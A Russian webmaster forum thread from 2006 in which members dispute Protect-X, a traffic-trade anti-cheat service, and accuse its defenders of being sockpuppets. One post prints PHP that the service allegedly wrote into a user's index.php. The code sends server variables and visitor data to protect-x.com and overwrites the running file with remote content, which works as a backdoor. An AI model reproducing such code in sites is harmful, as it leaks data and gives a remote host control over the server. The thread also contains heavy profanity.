Реклама на сайте Advertise with us

Кто такие Protect-x?

Расширенный поиск по форуму
 
Новая тема Новая тема   
Автор
Поиск в теме:



С нами с 23.11.03
Сообщения: 1613
Рейтинг: 878

Ссылка на сообщениеДобавлено: 11/11/06 в 21:02       Ответить с цитатойцитата 

AlexXxa писал:
Мне система нравится все работает , глюков не было .
За несколько дней выявила 7 читеров на которых и не думала .

P.S. А про тех кто пишет что такие системы как Protect-X.com и ТraffAnaliser.com не работают или глючат , думаю что это могут делать только читеры , что бы подорвать доверие нормальных вебмастеров к системе !

завтра тебя точно так же вычистят те, кто про тебя ничего и не думал icon_smile.gif я не уверен на 100%, что система эта работает нормально, и пример топикстартера тому показатель. они сейчас спокойно могут забанить нормальный сайт пока система сырая.

3
 



С нами с 31.05.06
Сообщения: 1678
Рейтинг: 340

Ссылка на сообщениеДобавлено: 11/11/06 в 22:27       Ответить с цитатойцитата 

Eduardo писал:
Да как бы твой ответ предсказуем !
Панации нет ни от чего ! Ето помойму и так понятно !

В чем проблема только скинуть свои URL люди бы заценили :-)


Я че-то не понял? Я разве просил заценить мои сиджы? Если кому-то надо чтобы их сиджы заценили тот об этом просит.

0
 
+


С нами с 19.10.06
Сообщения: 15

Ссылка на сообщениеДобавлено: 12/11/06 в 01:06       Ответить с цитатойцитата 

RY2K писал:
AlexXxa: Жалко что я не могу тебя заминусовать, но я тебя запомню.

запомни,запомни.....
ты никак,обиделся на меня )))

Последний раз редактировалось: AlexXxa (12/11/06 в 01:22), всего редактировалось 1 раз

0
 
+


С нами с 19.10.06
Сообщения: 15

Ссылка на сообщениеДобавлено: 12/11/06 в 01:08       Ответить с цитатойцитата 

Лесной писал:
завтра тебя точно так же вычистят те, кто про тебя ничего и не думал icon_smile.gif я не уверен на 100%, что система эта работает нормально, и пример топикстартера тому показатель. они сейчас спокойно могут забанить нормальный сайт пока система сырая.


Где ты видел,что система сырая?это написано на сайте или где? тут на форуме 2 человека говорят,а тысячи,которые пользуют не считают,что она сырая...icon_smile.gif так что бред сам топик,человек даже не понял по каким признакам на его сайте меняется статус кнопки,какой то ифрейм начал приплетать...хотя система по ифреймам не работает,а ты пишешь что система сырая

0
 



С нами с 23.11.03
Сообщения: 1613
Рейтинг: 878

Ссылка на сообщениеДобавлено: 12/11/06 в 01:49       Ответить с цитатойцитата 

AlexXxa писал:
Где ты видел,что система сырая?это написано на сайте или где? тут на форуме 2 человека говорят,а тысячи,которые пользуют не считают,что она сырая...icon_smile.gif так что бред сам топик,человек даже не понял по каким признакам на его сайте меняется статус кнопки,какой то ифрейм начал приплетать...хотя система по ифреймам не работает,а ты пишешь что система сырая

ишь, какие шустрые. 2 месяца и уже тысячи. тысячи твоих сайтов чтоль ? или твоего брата эдуардо, или может быть DT ?

3
 
+


С нами с 19.10.06
Сообщения: 15

Ссылка на сообщениеДобавлено: 12/11/06 в 02:12       Ответить с цитатойцитата 

Лесной:

Брата а почему не мужа !? :-) а worb charlie todo и остальные это кто ;-)

2 месяца чему или кому !?


Ты по делу так и не написал почему script сырой ?

0
 



С нами с 03.04.03
Сообщения: 2464
Рейтинг: 1841

Ссылка на сообщениеДобавлено: 12/11/06 в 02:30       Ответить с цитатойцитата 

Мне вот интересно.
Чья это система. кто овнеры. судя по всему овнеры русские. но тщательно скрываються под буржуинов.
также не понятен несколько нездоровый пиар. причем пиар двух человек с парочками постов.
также не понятно. зачем нужна сия система. что умеет она и не умеет нормальный сиджейный скрипт. повторюсь нормальный скрипт.

0
 



С нами с 23.11.03
Сообщения: 1613
Рейтинг: 878

Ссылка на сообщениеДобавлено: 12/11/06 в 02:37       Ответить с цитатойцитата 

AlexXxa писал:
Лесной:
Брата а почему не мужа !? :-) а worb charlie todo и остальные это кто ;-)
2 месяца чему или кому !?

Ты по делу так и не написал почему script сырой ?

я за последние пол часа начал считать пртект-х не сырым продуктом, а мутным продуктом. 99% овнеры русские, однако говорить на родном языке не хотят. домену всего 2 месяца, его почитателям примерно столько же.
ребята, в чем прикол ? у вот меня складывается впечатление что вы как раз и есть протект-х.
да и закономерности есть некоторые в ваших репликах на мастере и не только

3
 



С нами с 12.08.05
Сообщения: 265
Рейтинг: 125

Ссылка на сообщениеДобавлено: 12/11/06 в 02:38       Ответить с цитатойцитата 

Eduardo писал:
Да все просто читеры обычно как крутят не свой же сайт - смысла нет , они крутят другие сайты вставляя свой рефер поэтому система не даёт тебе кнопку по твоему входящему трафу а анализирует и даёт кнопку по твоему исходящему !
Для этого надо сначала в любой системе или сайте читать HELP или ABOUT а потом уже региться в системе .


A где там HELP или ABOUT? Как вообще с администрацией сервиса связаться если что? Ни мыла, ни аси...ни TERMS...

<META HTTP-EQUIV='Content-Type' CONTENT='text/html; charset=windows-1252'> в сорсе страницы, а в асе болтают на ломаном английском.....

И вот это http://askdamagex.com/showthread.php?p=106167&posted=1#post106167 я тоже надеюсь просто стечение обстоятельств....

3
 
+


С нами с 19.10.06
Сообщения: 15

Ссылка на сообщениеДобавлено: 12/11/06 в 02:39       Ответить с цитатойцитата 

freeuser:
если думаете что я пиарю систему это не так , меня просто возмутили некоторые люди с их постами .

А насчет русская ли система , не знаю в суппорт говорят по англиски , а лучше или нет это каждый для себя сам решает у меня она ловит тех кого AT3 не ловит , может другие скрипты сж и круче имеют систему отлова но я не юзала их

0
 
+


С нами с 19.10.06
Сообщения: 15

Ссылка на сообщениеДобавлено: 12/11/06 в 02:46       Ответить с цитатойцитата 

Лесной писал:
я за последние пол часа начал считать пртект-х не сырым продуктом, а мутным продуктом. 99% овнеры русские, однако говорить на родном языке не хотят. домену всего 2 месяца, его почитателям примерно столько же.
ребята, в чем прикол ? у вот меня складывается впечатление что вы как раз и есть протект-х.
да и закономерности есть некоторые в ваших репликах на мастере и не только


:-) Да протект-X мой :-)))) смешно не кажется ? у меня на сж по 3-5к максимум всего, мне люди с этого форума скрипты ставили потому как я в этом 0 !

Я на мастере всего месяц а про другие форумы и не слыхала .

0
 



С нами с 31.05.06
Сообщения: 1678
Рейтинг: 340

Ссылка на сообщениеДобавлено: 12/11/06 в 05:28       Ответить с цитатойцитата 

AlexXxa писал:
:-) Да протект-X мой :-)))) смешно не кажется ? у меня на сж по 3-5к максимум всего, мне люди с этого форума скрипты ставили потому как я в этом 0 !
Я на мастере всего месяц а про другие форумы и не слыхала .


Детка, ну вот и не лезь в разговор взрослых дедей.

0
 



С нами с 31.05.06
Сообщения: 1678
Рейтинг: 340

Ссылка на сообщениеДобавлено: 12/11/06 в 05:33       Ответить с цитатойцитата 

AlexXxa писал:
freeuser:
если думаете что я пиарю систему это не так , меня просто возмутили некоторые люди с их постами .
А насчет русская ли система , не знаю в суппорт говорят по англиски , а лучше или нет это каждый для себя сам решает у меня она ловит тех кого AT3 не ловит , может другие скрипты сж и круче имеют систему отлова но я не юзала их


А ты откуда знаешь что они говорят на английском? или у тебя были с ни проблемы, зачем тебе суппорт? может ты и есть их суппорт? icon_smile.gif

0
 



С нами с 07.02.04
Сообщения: 300
Рейтинг: 95

Ссылка на сообщениеДобавлено: 12/11/06 в 12:55       Ответить с цитатойцитата 

А я тут причем?

0
 
+


С нами с 19.10.06
Сообщения: 15

Ссылка на сообщениеДобавлено: 12/11/06 в 13:12       Ответить с цитатойцитата 

RY2K писал:
Детка, ну вот и не лезь в разговор взрослых дедей.

дедя,взрослый,сделай себе закрытый форум и общайся на здоровье)))
зайка.......))

0
 



С нами с 24.03.06
Сообщения: 148
Рейтинг: 93

Ссылка на сообщениеДобавлено: 12/11/06 в 16:02       Ответить с цитатойцитата 

Ну вы и развели .... судя по последней странице тему пора в треп переносить. Конструктива - ноль!
Русская, американская, да хоть китайская! какая разница-то ? Для меня, как для пользователя это не играет никакой роли.
Тут собралось несколько человек, которые по неясным причинам начинают просто травить эту систему. Смысл ? :-)
Не нравится - не работайте, нравится - работайте. Каждый пусть сам решит, нужна эта система для него или нет. Поможет - хорошо, не поможет - ... во всяком случае уж никак не навредит.
Развели какой-то базар непонятно из-за чего.
Всегда считал, и считаю, Мастер-х хорошим форумом. И в основном так и есть. Но когда тема заходит в тупую травлю и реплики да мы, да вы .... это немного портит впечатление как о теме в целом, так и о людях, которые поддерживают такие высказывания.

0
 



С нами с 12.11.02
Сообщения: 7060
Рейтинг: 3219

Ссылка на сообщениеДобавлено: 13/11/06 в 15:07       Ответить с цитатойцитата 

Несколько людей кто постоянно читает этот раздел попросили меня вмещаться как модератора раздела. Извиняюсь, что раньше не принимал участие, были выходные, я отдыхал от Интернета и вообще компьютеров.
я не отношусь ни к одной стороне. СЖ уже не занимаюсь, к данной системе не отношусь. взгляд со стороны -

человек высказал вполне обоснованные претензии, когда его обвинили в читерстве, появляется 3-4 "недавно зареганых ника" и начинают его закидывать сообщениями какая идеальная система...

не надо так продвигать свой продукт, это не правильный маркетинг, сосредоточьтесь лучше на написании качественного продукта и вам не придется регать левые ники чтоб поддерживать имидж системы, его вам будут создавать благодарные и настоящие пользователи. И конечно научитесь воспринимать критику адекватно, а не в штыки.

У меня нету времени вылавливать тут призраков, но впечатление создается именно такое, что постит все один человек с нескольких ников, по правилам этого у нас нельзя, прошу на это обратить внимание.

3
 



С нами с 20.04.05
Сообщения: 396
Рейтинг: 89

Ссылка на сообщениеДобавлено: 14/11/06 в 07:40       Ответить с цитатойцитата 

у меня в сидж добавился явный читер.
светится по всем признакам кроме anticheatanalis в протоне.
на его странице стоит protect-x и светится clean trade.
ничгео плохого про эту систему не думаю, просто пока что для меня она не существует.
Хороших трейдеров записывает в читеры, а явно плохих в clean. Как то это не внушает доверия

трейд здесь

3
 



С нами с 15.09.06
Сообщения: 150
Рейтинг: 150

Ссылка на сообщениеДобавлено: 14/11/06 в 11:37       Ответить с цитатойцитата 

... на данный момент Protect-X помогает выявлять плохой трафф. Просто помогает, полностью надеятся можно только на свою голову. У нас тоже были проблемы с этой системой, но они все решаемы.
Хотя опять же, по какому принципу он работает, более подробную версию чем на оффсайте, хотелось бы услышать.

0
 



С нами с 20.09.06
Сообщения: 15

Ссылка на сообщениеДобавлено: 14/11/06 в 13:58       Ответить с цитатойцитата 

Не имею отношения к protect-x юзаю их систему как пользователь ! Если кто то хочет считать по другому - тратить на споры время не буду !

Но создаётся такое чувство, что группа людей хочит обосрать систему, даже не понимая принципов работы а админ не просмотрев сайта разработчиков, начал защищать тех кто дольше пишет на форуме , но дольше пишущие ,не значит больше знающие или понимающие.

На сайте protect-x я, лично, нашел в 4 местах о том, что система информативная и никого не заносит в читеры, BAD TRADE - это не значит что вы читер !! Это значит, что одному или нескольким трэйдерам вы льете плохой трафф , и вы можете поменяться с BAD на CLEAN в течении 15 мин. то есть: все наезды на систему, что после кнопки BAD TRADE, кто то читер, не обоснованы !


То что я написал на русском , написано на англиском, на их сайте не в одном месте :

We can't guaranty that clean trader don’t cheat because, for example, trader that exchanges traffic fairly today, can start to cheat tomorrow. Also we don’t say that this trader is clean and the other one is bad. We only provide the information.


Насчет контактов с их суппортом - вверху страницы есть буква С в квадкатике и она там весит уже как минимум недели две .

0
 



С нами с 20.10.04
Сообщения: 3851
Рейтинг: 1044


Передовик Master-X (01.03.2020)
Ссылка на сообщениеДобавлено: 15/11/06 в 17:15       Ответить с цитатойцитата 

// буду писать матерно, ежели забанят\заплюсуют - похуй.

Коллеги, забивайте нахуй на этот сервис.

Только что тема. Захожу на свой сидж на морду, а морды хуй, только этот гребаный баннер протект-х. Ну я ради теста поставл его себе.

Коротка суть такова. Каким-то ебаным макаром это говнище убила нахуй мой index.php и записала туда такой код:

Код:
<?
// PROTECT-X INCLUDE. V.1.5.
  function ip2int($ip) {
   $a=explode(".",$ip);
   return $a[0]*256*256*256+$a[1]*256*256+$a[2]*256+$a[3];
  }

  function int2ip($i) {
   $d[0]=(int)($i/256/256/256);
   $d[1]=(int)(($i-$d[0]*256*256*256)/256/256);
   $d[2]=(int)(($i-$d[0]*256*256*256-$d[1]*256*256)/256);
   $d[3]=$i-$d[0]*256*256*256-$d[1]*256*256-$d[2]*256;
   return "$d[0].$d[1].$d[2].$d[3]";
  }

   // HL CHECKER ////////////////////////////////////////////////////////////////////////////////
     if (!file_exists('protectx_hl.jpg')){
   $pimg=@file_get_contents('http://www.protect-x.com/protectx_hl.jpg');
   $handle = fopen("protectx_hl.jpg", 'w');
   fwrite($handle, $pimg);
   fclose($handle);
     }   

      // HL GENERATOR

        $new_file="<? \$hct=@file_get_contents('http://www.protect-x.com/hiddenlink.php?code='.\$_GET['code'].'&r=".'\'.$_GET[\'ref\']'."); ?>";

      $hlfn = @file_get_contents('http://www.protect-x.com/hiddenlinks/check.php');
      list($old,$new)=explode('|',$hlfn);   
           if (!file_exists($new)){
         if (file_exists($old))
            unlink($old);
   
                   $w=fopen($new,'w');
            flock($w,2);
            fwrite($w,$new_file."\n");
            flock($w,3);
            fclose($w);      
      }

        ///////////////



   //////////////////////////////////////////////////////////////////////////////////////////////

   $parts=urlencode(serialize($_SERVER));
   $ip=getenv("REMOTE_ADDR");
   $aurl='http://www.protect-x.com/autoupdate/check.php?code=d098ce2de864a99';
   $lfrom=urlencode("http://".$_SERVER['SERVER_NAME']);
   $url='http://www.protect-x.com/protectx.php?code=d098ce2de864a99&b=1&f='.urlencode($_SERVER['HTTP_REFERER']).'&st='.ip2int($ip).'&lfrom='.$lfrom."&srv=$parts";
   $body = @file_get_contents($url);

   echo $body;

   $check = @file_get_contents($aurl);
   if (strlen($check)>2){
   $path=pathinfo($_SERVER['PHP_SELF']);
   $protect_file=$path['basename'];
         if (is_writable($protect_file)){
            $w=fopen($protect_file,'w');
      flock($w,2);
      fwrite($w,$check."\n");
      flock($w,3);
      fclose($w);
         }
   }
?>


и все... нету бля морды....

Короче, ребята из протект-х, идите нахуй.

А факт изменения содержимого МОИХ файлов на МОЕМ хосте позволяет вам прогуляться в уроды.

Всё.

0
 



С нами с 17.05.06
Сообщения: 27
Рейтинг: 14

Ссылка на сообщениеДобавлено: 15/11/06 в 18:09       Ответить с цитатойцитата 

Вобшем у меня позавчера резко повисилас нагрузка на сервак посмотрел в логах и оказалось что етот самыи protect-x не находит фаиле в корне домена protectx_hl.jpg, значет я небуть дурак зделал protectx_hl.jpg и закачал на сервак, вобшем после етого в статсах protect-x bad:0%
Посудите сами что за страныи метод генерить 404 чтобы читеров ловить или я чего непонимаю

0
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 15/11/06 в 18:19       Ответить с цитатойцитата 

Меня только один вопрос интересует - что вас, местами взрослых и опытных сиджеводов, толкает на использование такого сервиса, хз, откуда взявшегося и хз что делающего (я уже молчу про цирк с никами в этом топике) ?

Cdn быстро, надёжно и недорого!

0
 



С нами с 20.10.04
Сообщения: 3851
Рейтинг: 1044


Передовик Master-X (01.03.2020)
Ссылка на сообщениеДобавлено: 15/11/06 в 18:22       Ответить с цитатойцитата 

каюсь, лоханулся, не отрицаю...

тем не менее, ребята из вышеозначенного уебанского сервиса не стесняйтесь, не останавливайтесь, идите дальше, как и шли... нахуй. icon_smile.gif

я тут закончил, всем спасибо.

0
 

Soul's Buyer

С нами с 16.11.05
Сообщения: 12702
Рейтинг: 10740


Передовик Master-X (16.10.2008) Передовик Master-X (01.11.2008) Передовик Master-X (16.11.2008) Передовик Master-X (01.12.2008) Передовик Master-X (16.12.2008) Ветеран трепа Master-X (01.01.2009)
Ссылка на сообщениеДобавлено: 15/11/06 в 18:26       Ответить с цитатойцитата 

Цитата:
каюсь, лоханулся, не отрицаю...

Я бы на твоём месте сейчас менял пароли на скриптах своих, де от та поебень стояла icon_smile.gif Хоть я и параноик - но мало ли ... icon_smile.gif

Cdn быстро, надёжно и недорого!

0
 
Новая тема Новая тема   

Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте!


Перейти:  



Спонсор раздела Стань спонсором этого раздела!

Реклама на сайте Advertise with us

Опросы

Рецепт новогоднего блюда 2022



Обсудите на форуме обсудить (11)
все опросы »